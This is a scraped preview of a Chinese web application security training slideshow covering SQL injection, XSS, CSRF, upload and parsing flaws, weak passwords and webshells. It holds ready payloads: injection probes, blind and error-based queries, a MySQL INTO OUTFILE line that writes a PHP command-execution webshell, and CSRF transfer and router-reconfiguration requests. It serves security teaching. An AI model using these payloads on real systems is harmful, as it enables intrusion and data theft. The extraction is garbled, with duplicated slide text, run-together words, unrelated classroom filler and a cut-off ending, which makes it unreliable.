WEB應(yīng)用安全培訓(xùn)-課件_第1頁
WEB應(yīng)用安全培訓(xùn)-課件_第2頁
WEB應(yīng)用安全培訓(xùn)-課件_第3頁
WEB應(yīng)用安全培訓(xùn)-課件_第4頁
WEB應(yīng)用安全培訓(xùn)-課件_第5頁
已閱讀5頁,還剩45頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認(rèn)領(lǐng)

文檔簡介

WEB應(yīng)用安全培訓(xùn)WEB應(yīng)用安全培訓(xùn)常見WEB漏洞常見WEB后門介紹常見WEB漏洞常見WEB后門介紹精品資料精品資料你怎么稱呼老師?如果老師最后沒有總結(jié)一節(jié)課的重點的難點,你是否會認(rèn)為老師的教學(xué)方法需要改進?你所經(jīng)歷的課堂,是講座式還是討論式?教師的教鞭“不怕太陽曬,也不怕那風(fēng)雨狂,只怕先生罵我笨,沒有學(xué)問無顏見爹娘……”“太陽當(dāng)空照,花兒對我笑,小鳥說早早早……”WEB應(yīng)用安全培訓(xùn)-ppt課件漏洞名稱漏洞等級SQL注入高??缯灸_本攻擊漏洞高危Cookie欺騙高危CSRF(跨站請求偽造)中危Web信息泄露中危權(quán)限問題中危邏輯漏洞中危第三方程序漏洞高危Web服務(wù)器解析漏洞高危弱口令高危SSRF中危常見的Web漏洞漏洞名稱漏洞等級SQL注入高??缯灸_本攻擊漏洞高危CookiSQL注入漏洞介紹

由于程序中對用戶輸入檢查不嚴(yán)格,用戶可以提交一段數(shù)據(jù)庫查詢代碼,根據(jù)程序返回的結(jié)果,獲得某些他想得知的數(shù)據(jù),這就是所謂的SQLInjection,即SQL注入。原因分析

其本質(zhì)是由于對輸入檢查不充分,導(dǎo)致SQL語句將用戶提交的非法數(shù)據(jù)當(dāng)作語句的一部分來執(zhí)行。SQL注入漏洞介紹SQL注入SQL注入分類:按提交字符類型可分為:數(shù)字型字符型搜索型按HTTP提交方式可分為:GET、POST、Cookie按注入方式可分為:盲注、union注入、報錯注入、基于時間注入編碼問題:寬字節(jié)注入SQL注入SQL注入分類:SQL注入如何判斷?1.單引號判斷2.數(shù)字型注入判斷①and1=1and1=2and1isnulland1isnotnullanduser>0②參數(shù)進行運算+1-1'+'→'%2B'3.字符型注入判斷①'and'1'='1'and'1'='24.搜索型注入判斷①test%'and1=1and'%'='test%'and1=2and'%'='SQL注入如何判斷?SQL注入-相關(guān)表Sysobjects,syscolumnsInformation_schema.TABLES[Table_schema][table_name]Information_schema.COLUMNSuser_tab_columnsuser_tables

SQL注入-相關(guān)表SQL注入-盲注Accessand(selecttop1asc(mid(id,1,1))fromadmin)>0MSSQLand(selecttop1ascii(substring(password,1,1))fromadmin)>0MysqlAnd(selectascii(substr(pass,1,1))fromadminlimit1)>0oracle

And(selectascii(substr(pass,1,1))formadminwhererownum=1)>0SQL注入-盲注AccessSQL注入-報錯and(selecttop1namefromsysobjects)=1and(select1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23||utl_inaddr.get_host_name((select

bannerfromv$versionwhererownum=1))–

SQL注入-報錯and(selecttop1nameSQL注入MySQL寫文件and1=2unionselect1,2,'<?phpsystem($_REQUEST[cmd]);?>',4,5,6intooutfile'C:/apache/htdocs/site/shell.php‘Load_file(讀取文件的路徑)SQL注入SQL注入搜索型注入Select相應(yīng)字段from[表名]where搜索條件Like'科技%'and1=1and'%'='%'[搜索關(guān)鍵字]%'and[payload]and'%'='SQL注入SQL注入自動化工具SQLMAPSQL注入自動化工具SQLMASQL注入自動化工具HavijSQL注入自動化工具HavijSQL注入自動化工具PangolinSQL注入自動化工具PangolXSS跨站腳本攻擊漏洞介紹

惡意攻擊者往Web頁面里插入惡意html代碼,當(dāng)用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執(zhí)行,從而達(dá)到惡意攻擊用戶的特殊目的。XSS本質(zhì)是在于執(zhí)行腳本[javascript/html等]攻擊者的js能力越強攻擊效果越驚人!XSS漏洞分類:①反射型XSS

②存儲型XSSXSS跨站腳本攻擊漏洞介紹XSS跨站腳本攻擊XSS的危害通過XSS執(zhí)行的javascript,可以做到…竊取你正在瀏覽的cookies信息篡改你正在瀏覽的頁面,注入誤導(dǎo)信息捕獲你的所有操作,并發(fā)送給黑客從定向到黑客的釣魚站點利用瀏覽器的漏洞控制你的機器…XSS跨站腳本攻擊通過XSS執(zhí)行的javascript,可以持久型跨站腳本攻擊場景1.正常服務(wù)器信息2.服務(wù)器存儲惡意代碼3.用戶瀏覽網(wǎng)頁4.服務(wù)器將惡意代碼返回給用戶5.客戶端瀏覽器執(zhí)行惡意代碼Web服務(wù)器重要通知Re:沙發(fā)??!Re:地板?Re:地下室沙發(fā)……Re:地下室地板-_-!!Re:免費獲取Q幣!??!內(nèi)容:<script>惡意代碼</script>Re:誰又發(fā)垃圾廣告啦?1普通用戶客戶端34惡意代碼執(zhí)行!5攻擊者在論壇發(fā)帖子:免費獲取Q幣?。?!<script>惡意代碼</script>2持久型跨站腳本攻擊場景1.正常服務(wù)器信息2.服務(wù)器存儲惡XSS跨站腳本攻擊注冊用戶發(fā)帖,內(nèi)容如下所示XSS跨站腳本攻擊XSS跨站腳本攻擊Admin用戶登錄瀏覽剛才的帖子XSS跨站腳本攻擊非持久型跨站腳本攻擊場景瀏覽器瀏覽器Outlook正常訪問惡意代碼隱藏在鏈接中“reflected”代碼1From:攻擊者To:用戶免費贈送Q幣?。?!CLICKHERE惡意代碼安全上下文:目標(biāo)站點普通合法會話安全上下文:目標(biāo)站點攻擊者Web服務(wù)器普通用戶客戶端12345惡意代碼執(zhí)行!非持久型跨站腳本攻擊場景瀏覽器瀏覽器Outlook正常訪問惡XSS跨站腳本攻擊反射型XSSXSS跨站腳本攻擊反射型XSSXSS跨站腳本攻擊XSS攻擊平臺XSS跨站腳本攻擊XSS攻擊平臺CSRF跨站請求偽造CSRF是什么?CSRF(Cross-siterequestforgery)跨站請求偽造。你這可以這么理解CSRF攻擊:攻擊者盜用了你的身份,以你的名義發(fā)送惡意請求。CSRF能夠做的事情包括:以你名義發(fā)送郵件,發(fā)消息,盜取你的賬號,甚至于購買商品,虛擬貨幣轉(zhuǎn)賬......造成的問題包括:個人隱私泄露以及財產(chǎn)安全。CSRF跨站請求偽造CSRF是什么?跨站請求偽造(CSRF)場景攻擊者:小明受害人:老王銀行網(wǎng)站:www.xxx.com惡意網(wǎng)站:www.B.com1.A銀行轉(zhuǎn)賬鏈接:/Transfer.php?toBankId=666&money=10002.<imgsrc=.xxx.com/Transfer.php?toBankId=777&money=1000>跨站請求偽造(CSRF)場景攻擊者:小明CSRF跨站請求偽造針對路由器的攻擊m.htm?dhcpserver=1&ip1=00&ip2=99&Lease=120&gateway=&domain=&dnsserver=&dnsserver=&dnsserver2=&Save=%25B1%25A3+%25B4%25E6CSRF跨站請求偽造針對路由器的攻擊Cookie欺騙Cookie用于身份驗證本地可控Cookie欺騙CookieCookie欺騙示意圖通過用戶名密碼認(rèn)證后將用戶信息存儲在Cookie里.但是在做Cookie認(rèn)證的時候,只讀取了Cookie里面的用戶名信息.Cookie欺騙示意圖通過用戶名密碼認(rèn)證后將用戶信息存儲在C驗證不充分之上傳漏洞客戶端檢測(javascript擴展名檢測)瀏覽器禁用JavaScript服務(wù)端檢測(MIME類型檢測)偽造Content-type:image/gif服務(wù)端檢測(文件頭檢測)偽造文件頭(GIF89a)服務(wù)端檢測(目錄路徑檢測)%00截斷服務(wù)端檢測(文件擴展名檢測)①白名單②黑名單驗證不充分之上傳漏洞客戶端檢測(javascript擴展名檢驗證不充分之文件包含易受攻擊的代碼片斷:<?php$content=$_GET['content'];include($content);?>攻擊者用如下請求可以包含圖片木馬:驗證不充分之文件包含易受攻擊的代碼片斷:驗證不充分之任意文件讀取驗證不充分之任意文件讀取驗證不充分之變量覆蓋易受攻擊的代碼片段:<?phpif($pass=="hello"){$auth=1;}Parse_str($_SERVER['QUERY_STRING']

);if($auth==1){echo"someimportantinformation";}?>

上面的代碼首先檢查用戶的密碼是否為"hello",如果匹配的話,設(shè)置"$auth"為"1",即通過認(rèn)證。之后如果"$suth"為"1"的話,就會顯示一些重要信息。這段代碼假定"$auth"在沒有設(shè)置值的時候是空的,但是攻擊者可以創(chuàng)建任何全局變量并賦值,通過類似""的方法,我們完全可以欺騙這段代碼,使它相信我們是已經(jīng)認(rèn)證過的。驗證不充分之變量覆蓋易受攻擊的代碼片段:邏輯漏洞不同的用戶錯誤判斷出存在admin用戶邏輯漏洞不同的用戶錯誤邏輯漏洞找回密碼設(shè)計缺陷修改任意用戶密碼邏輯漏洞找回密碼設(shè)計缺陷修解析漏洞IIS6.0解析漏洞①目錄解析/test.asp/test.jpg②文件解析/test.asp;1.jpgIIS6.0默認(rèn)的可執(zhí)行文件除了asp還包含這三種①/test.asa②/test.cer③/test.cdx解析漏洞IIS6.0解析漏洞解析漏洞Apache解析漏洞Apache是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷。/test.php.xxx/test.php.rar解析漏洞Apache解析漏洞解析漏洞Nginx解析漏洞影響版本:0.5.,0.6.,0.7<=0.7.65,0.8<=0.8.37/test.jpg/1.php/test.jpg%00.php解析漏洞Nginx解析漏洞第三方漏洞①FCKeditor編輯器上傳漏洞,任意創(chuàng)建文件漏洞②eWebEeditor編輯器,上傳漏洞,遍歷目錄漏洞③ThinkPHP任意代碼執(zhí)行漏洞④Struts2遠(yuǎn)程命令執(zhí)行漏洞⑤Web中間件(Tomcat、Weblogic、Jboss)第三方漏洞①FCKeditor編輯器上傳漏洞,任意創(chuàng)建文件Struts2遠(yuǎn)程命令執(zhí)行Struts2遠(yuǎn)程命令執(zhí)行tomcattomcatJBossJBossFckeditor/ewebeditor/kindeditor遍歷目錄上傳漏洞構(gòu)造相應(yīng)語句Fckeditor/ewebeditor/kindedito弱口令什么是弱口令?弱口令(weakpassword)沒有嚴(yán)格和準(zhǔn)確的定義,通常認(rèn)為容易被別人(他們有可能對你很了解)猜測到或被破解工具破解的口令均為弱口令。

弱口令指的是僅包含簡單數(shù)字和字母的口令,例如“123”、“abc”等,因為這樣的口令很容易被別人破解,從而使用戶的計算機面臨風(fēng)險,因此不推薦用戶使用。

弱口令什么是弱口令?弱口令

TOMCAT弱口令直接上傳WEBSHELL弱口令TOMCAT弱口令直接上傳WEBSHELL弱口令

針對弱口令的爆破Burpsuite、Hydra等弱口令針對弱口令的爆破Bu常見WEB后門介紹什么是WEBSHELL?顧名思義,“web”的含義是顯然需要服務(wù)器開放web服務(wù)“shell”的含義是取得對服務(wù)器某種程度上操作權(quán)限。webshell常常被稱為匿名用戶(入侵者)通過網(wǎng)站端口對網(wǎng)站服務(wù)器

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論